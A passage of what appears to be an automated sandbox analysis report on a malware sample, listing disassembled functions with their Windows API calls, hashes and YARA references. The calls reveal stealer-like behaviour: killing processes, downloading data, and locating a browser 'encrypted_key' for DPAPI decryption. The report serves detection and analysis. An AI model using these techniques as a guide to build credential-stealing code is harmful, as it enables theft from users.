                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                      • String ID:
                                                      • API String ID: 3894370878-0
                                                      • Opcode ID: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
                                                      • Instruction ID: 71c2a2d1e8b1bff0245bb1ace4ede4100b9513cc3bd865d9341d2d7473e0af64
                                                      • Opcode Fuzzy Hash: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
                                                      • Instruction Fuzzy Hash: FB415C70A00605AFDB24CF54DD88B9BB7B5FF48304F14806AE909AB3D1D7759941CFA8
                                                      Function 00424950 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424969
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 00424979
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0042498B
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004249AC
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 004249BB
                                                      • CloseHandle.KERNEL32(00000000), ref: 004249C2
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004249D0
                                                      • CloseHandle.KERNEL32(00000000), ref: 004249DB
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction ID: 1dcc0a632c58819bc0603b9dca4f2ab71f075bb114674fc9a8b609d01bacb988
                                                      • Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction Fuzzy Hash: 860180B1601224ABE7215B70AC89FEB776DEB48751F00118AF909D2290DFB49D908EA4
                                                      Function 02C94BB7 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 02C94BD0
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 02C94BE0
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94BF2
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02C94C13
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 02C94C22
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C94C29
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 02C94C37
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C94C42
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction ID: 93cb1277877fc57b84c0c9a042a6812569ce4495034f74c739d86ec097ccb824
                                                      • Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                      • Instruction Fuzzy Hash: CF019271641614AFEB345B609C8DFEA777DEB48752F001188F90992191DFB0CA90CAB0
                                                      Function 02C7E611 Relevance: 10.9, APIs: 7, Instructions: 441stringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7E92C
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7E955
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7E98E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7E9B4
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C7E9EB
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02C7EA21
                                                      • FindClose.KERNEL32(00000000), ref: 02C7EA30
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717BE
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717E0
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71802
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71866
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$Find$CloseFileNext
                                                      • String ID:
                                                      • API String ID: 1875835556-0
                                                      • Opcode ID: 6fdd74faf7a7e66fe5d0f030622722a7a94ed3865e5b6c3e1762540d0db14b48
                                                      • Instruction ID: c0941da13553d1fb545176d03d2338bd671d76733494e2ab52401088d4e07c77
                                                      • Opcode Fuzzy Hash: 6fdd74faf7a7e66fe5d0f030622722a7a94ed3865e5b6c3e1762540d0db14b48
                                                      • Instruction Fuzzy Hash: 28020C76A012118FDB28CF29C584B65BBE5BF84718B19C0EDD809DB3A1D772E942CF90
                                                      Function 02C7A047 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 182memorystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memset.MSVCRT ref: 02C7A0D6
                                                      • LocalAlloc.KERNEL32(00000040), ref: 02C7A10E
                                                        • Part of subcall function 02C97657: lstrcpy.KERNEL32(00000000,ERROR), ref: 02C97675
                                                      • lstrcpy.KERNEL32(00000000,00434C50), ref: 02C7A219
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$AllocLocalmemset
                                                      • String ID: @$DLC$HLC
                                                      • API String ID: 4098468873-1894397651
                                                      • Opcode ID: f1e8425887af69d33d029186a1e0f3ff7f5477a46881576f8d76e6f871c47b0f
                                                      • Instruction ID: e94b26448a349ca1d2513fcb1e0afbb923288247a39beda69398eae6d41fb83b
                                                      • Opcode Fuzzy Hash: f1e8425887af69d33d029186a1e0f3ff7f5477a46881576f8d76e6f871c47b0f
                                                      • Instruction Fuzzy Hash: 02510071A002899BEB00EF69DC84BDD7BB5EF94318F154025ED08AB240EB70ED45CF91
                                                      Function 004071F0 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?), ref: 0040723E
                                                      • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00407279
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00407280
                                                      • memcpy.MSVCRT(00000000,?), ref: 004072AD
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004072C3
                                                      • HeapFree.KERNEL32(00000000), ref: 004072CA
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00407329
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
                                                      • String ID:
                                                      • API String ID: 1745114167-0
                                                      • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction ID: 5c04f978e963cdea92a01edc1f3ad230323f660b4d2968f88ba47752cd35672e
                                                      • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction Fuzzy Hash: 35416B71B046069BEB20CF69DC84BAAB3E9FB84305F1445BAEC49D7380E635F900DB65
                                                      Function 02C77457 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?), ref: 02C774A5
                                                      • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02C774E0
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C774E7
                                                      • memcpy.MSVCRT(00000000,?), ref: 02C77514
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7752A
                                                      • HeapFree.KERNEL32(00000000), ref: 02C77531
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 02C77590
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
                                                      • String ID:
                                                      • API String ID: 413393563-0
                                                      • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction ID: 6520609a1e3d518716447f8ad2c879fd6bb04046e29d4a4915758cab7881ad8a
                                                      • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                      • Instruction Fuzzy Hash: 0D416D71B007099BDB60CF69DC84BAAF7E9EB84309F1445A9E84EC7310E775E904CB90
                                                      Function 00409C70 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 123memorystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 00409CA8
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409CDA
                                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D03
                                                      • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D3C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocLocallstrcpymemcmp
                                                      • String ID: $"encrypted_key":"$DPAPI
                                                      • API String ID: 4154055062-738592651
                                                      • Opcode ID: ee76a46e03c395f16d6886720c5a89f914cd7747952363acaa8c1ee084f86bd8
                                                      • Instruction ID: 6c8d556d21e19e5d3b0639c321864ed51762282b360f53d65d825accd8ba46b4
                                                      • Opcode Fuzzy Hash: ee76a46e03c395f16d6886720c5a89f914cd7747952363acaa8c1ee084f86bd8
                                                      • Instruction Fuzzy Hash: 48418E31B0020A9BDB21EF69DD456AF77B4AF44308F04407AED15B72E3DA78AD04CB98
                                                      Function 00418190 Relevance: 10.6, APIs: 7, Instructions: 112stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 004181B5
                                                      • lstrlenA.KERNEL32(00000000), ref: 004181FB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0041822A
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 00418242
                                                      • lstrlenA.KERNEL32(00000000), ref: 00418280
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004182AF
                                                      • strtok_s.MSVCRT ref: 004182BF
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpylstrlenstrtok_s
                                                      • String ID:
                                                      • API String ID: 3280532728-0
                                                      • Opcode ID: 1a58f1b32fa22629d4b6815d1c469958d462c1abccdf26540bb9a773ebb1c3c0
                                                      • Instruction ID: 44e3f82219f4b5846f9302bf287b5fdcc788e1807cf968ce595ad677923a09cd
                                                      • Opcode Fuzzy Hash: 1a58f1b32fa22629d4b6815d1c469958d462c1abccdf26540bb9a773ebb1c3c0
                                                      • Instruction Fuzzy Hash: D4417E756006069FCB22DF68DA48BABBBB4EF44700F10416EAC49D7344EB78D981CB99
                                                      Function 02C883F7 Relevance: 10.6, APIs: 7, Instructions: 112stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 02C8841C
                                                      • lstrlen.KERNEL32(00000000), ref: 02C88462
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C88491
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 02C884A9
                                                      • lstrlen.KERNEL32(00000000), ref: 02C884E7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C88516
                                                      • strtok_s.MSVCRT ref: 02C88526
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpylstrlenstrtok_s
                                                      • String ID:
                                                      • API String ID: 3280532728-0
                                                      • Opcode ID: 1bc2e37c1a21135defa26a9ed81cbec90adad79c8ff921a3e68a1739e3be9e3d
                                                      • Instruction ID: 19c2239f765859a9a30143d7dff52f37188c4727ddd9f692f09d1d730d7748f3
                                                      • Opcode Fuzzy Hash: 1bc2e37c1a21135defa26a9ed81cbec90adad79c8ff921a3e68a1739e3be9e3d
                                                      • Instruction Fuzzy Hash: CF419E7560020A9FDB21EF78D954BAABBF5EF84708F508219EC49D7644EB34EA41CF90
                                                      Function 02C758A7 Relevance: 10.6, APIs: 7, Instructions: 112networkmemoryfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02C758C1
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C758C8
                                                      • InternetOpenA.WININET(0042CFF4,00000000,00000000,00000000,00000000), ref: 02C758DE
                                                      • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 02C758F9
                                                      • InternetReadFile.WININET(?,?,00000400,00000001), ref: 02C75923
                                                      • InternetCloseHandle.WININET(?), ref: 02C75961
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C75968
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                      • String ID:
                                                      • API String ID: 3066467675-0
                                                      • Opcode ID: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
                                                      • Instruction ID: 241b920f82534712aa5548f1850683a9f1ba9fbfc84c930526b3dc379e8b0192
                                                      • Opcode Fuzzy Hash: 39bfd9abbbfd464b144cda71feed78c781dd4d2607ed895f946f54a5c8bb3dbb
                                                      • Instruction Fuzzy Hash: 5541B370A00305AFDB24CF54DC88F9AB7B5FF88755F14806DE9199B290E7719A42CFA4
                                                      Function 00417E80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417E98
                                                        • Part of subcall function 0042A3D0: std::exception::exception.LIBCMT ref: 0042A3E5
                                                        • Part of subcall function 0042A3D0: __CxxThrowException@8.LIBCMT ref: 0042A3FA
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417EB6
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417ED1
                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00417DBA,00000000,?,?,00000000,?,00409186,?), ref: 00417F34
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
                                                      • String ID: invalid string position$string too long
                                                      • API String ID: 702443124-4289949731
                                                      • Opcode ID: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
                                                      • Instruction ID: 76ed7461fbfc9217e49c2ea02518e7ea48320d37208f920ac55b1611293e244f
                                                      • Opcode Fuzzy Hash: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
                                                      • Instruction Fuzzy Hash: ED2193313083008BD724DE2CE880A6BB7F5AB95714B204A6FF5968B781D779DC858769
                                                      Function 00422AE0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422AF5
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00422AFC
                                                      • RegOpenKeyExA.ADVAPI32(80000002,02D69640,00000000,00020119,00422A79), ref: 00422B1B
                                                      • RegQueryValueExA.ADVAPI32(00422A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422B35
                                                      • RegCloseKey.ADVAPI32(00422A79), ref: 00422B3F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                      • String ID: CurrentBuildNumber
                                                      • API String ID: 3466090806-1022791448
                                                      • Opcode ID: eedc4f5b1c834951d409d8a86460196dbdad40995e2cb2646183cc9f75c04971
                                                      • Instruction ID: e4efa8e5db0ad91907f3ecacc4057bf76477b8c471b957b80fd295e858fd28ec
                                                      • Opcode Fuzzy Hash: eedc4f5b1c834951d409d8a86460196dbdad40995e2cb2646183cc9f75c04971
                                                      • Instruction Fuzzy Hash: 43019E75A00318BFD314DFA0AC59FEB7BB9AB48741F100099FE4597241EAB169048BA0
                                                      Function 00422A50 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422A65
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00422A6C
                                                        • Part of subcall function 00422AE0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422AF5
                                                        • Part of subcall function 00422AE0: HeapAlloc.KERNEL32(00000000), ref: 00422AFC
                                                        • Part of subcall function 00422AE0: RegOpenKeyExA.ADVAPI32(80000002,02D69640,00000000,00020119,00422A79), ref: 00422B1B
                                                        • Part of subcall function 00422AE0: RegQueryValueExA.ADVAPI32(00422A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422B35
                                                        • Part of subcall function 00422AE0: RegCloseKey.ADVAPI32(00422A79), ref: 00422B3F
                                                      • RegOpenKeyExA.ADVAPI32(80000002,02D69640,00000000,00020119,00419650), ref: 00422AA1
                                                      • RegQueryValueExA.ADVAPI32(00419650,02D8DDB8,00000000,00000000,00000000,000000FF), ref: 00422ABC
                                                      • RegCloseKey.ADVAPI32(00419650), ref: 00422AC6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                      • String ID: Windows 11
                                                      • API String ID: 3466090806-2517555085
                                                      • Opcode ID: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
                                                      • Instruction ID: a9c7c9cb406362f8c98b7ce0903b7f6c91ff65f0f4129b57f21ef6d77cd7d43d
                                                      • Opcode Fuzzy Hash: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
                                                      • Instruction Fuzzy Hash: 0D01AD71700319BFDB24DBA4AD49EEA777EEB44715F000159FE09D3290EAB499448BE0
                                                      Function 02C92CB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02C92CCC
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C92CD3
                                                        • Part of subcall function 02C92D47: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02C92D5C
                                                        • Part of subcall function 02C92D47: RtlAllocateHeap.NTDLL(00000000), ref: 02C92D63
                                                        • Part of subcall function 02C92D47: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02C92CE0), ref: 02C92D82
                                                        • Part of subcall function 02C92D47: RegQueryValueExA.ADVAPI32(02C92CE0,0043509C,00000000,00000000,00000000,000000FF), ref: 02C92D9C
                                                        • Part of subcall function 02C92D47: RegCloseKey.ADVAPI32(02C92CE0), ref: 02C92DA6
                                                      • RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02C898B7), ref: 02C92D08
                                                      • RegQueryValueExA.ADVAPI32(02C898B7,00638C34,00000000,00000000,00000000,000000FF), ref: 02C92D23
                                                      • RegCloseKey.ADVAPI32(02C898B7), ref: 02C92D2D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                      • String ID: Windows 11
                                                      • API String ID: 3225020163-2517555085
                                                      • Opcode ID: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
                                                      • Instruction ID: 17d220b1673d20959198d655b0752d468c0e236664f15c6940408a5b0212a564
                                                      • Opcode Fuzzy Hash: b642a3f9019f6a807e9ec53380fffd667bb34812bb00b42261cd3da1f3ae903b
                                                      • Instruction Fuzzy Hash: CB01ADB5600308BFEB14DBA4EC4DEEA7B7EEB44315F001159FE09D7290DAB09A448BE1
                                                      Function 02C77CC7 Relevance: 10.1, APIs: 8, Instructions: 109stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 02C77A37: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02C77A6C
                                                        • Part of subcall function 02C77A37: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 02C77AB1
                                                        • Part of subcall function 02C77A37: strlen.MSVCRT ref: 02C77AE5
                                                        • Part of subcall function 02C77A37: StrStrA.SHLWAPI(?,00434ACC), ref: 02C77B1F
                                                        • Part of subcall function 02C77A37: strcpy_s.MSVCRT ref: 02C77B48
                                                        • Part of subcall function 02C77A37: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77B53
                                                        • Part of subcall function 02C77A37: HeapFree.KERNEL32(00000000), ref: 02C77B5A
                                                        • Part of subcall function 02C77A37: strlen.MSVCRT ref: 02C77B67
                                                      • lstrcat.KERNEL32(00638E68,00434ADC), ref: 02C77CF7
                                                      • lstrcat.KERNEL32(00638E68,?), ref: 02C77D24
                                                      • lstrcat.KERNEL32(00638E68,00434AE0), ref: 02C77D36
                                                      • lstrcat.KERNEL32(00638E68,?), ref: 02C77D57
                                                      • wsprintfA.USER32 ref: 02C77D77
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C77DA0
                                                      • lstrcat.KERNEL32(00638E68,00000000), ref: 02C77DAE
                                                      • lstrcat.KERNEL32(00638E68,00434ADC), ref: 02C77DC7
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                      • String ID:
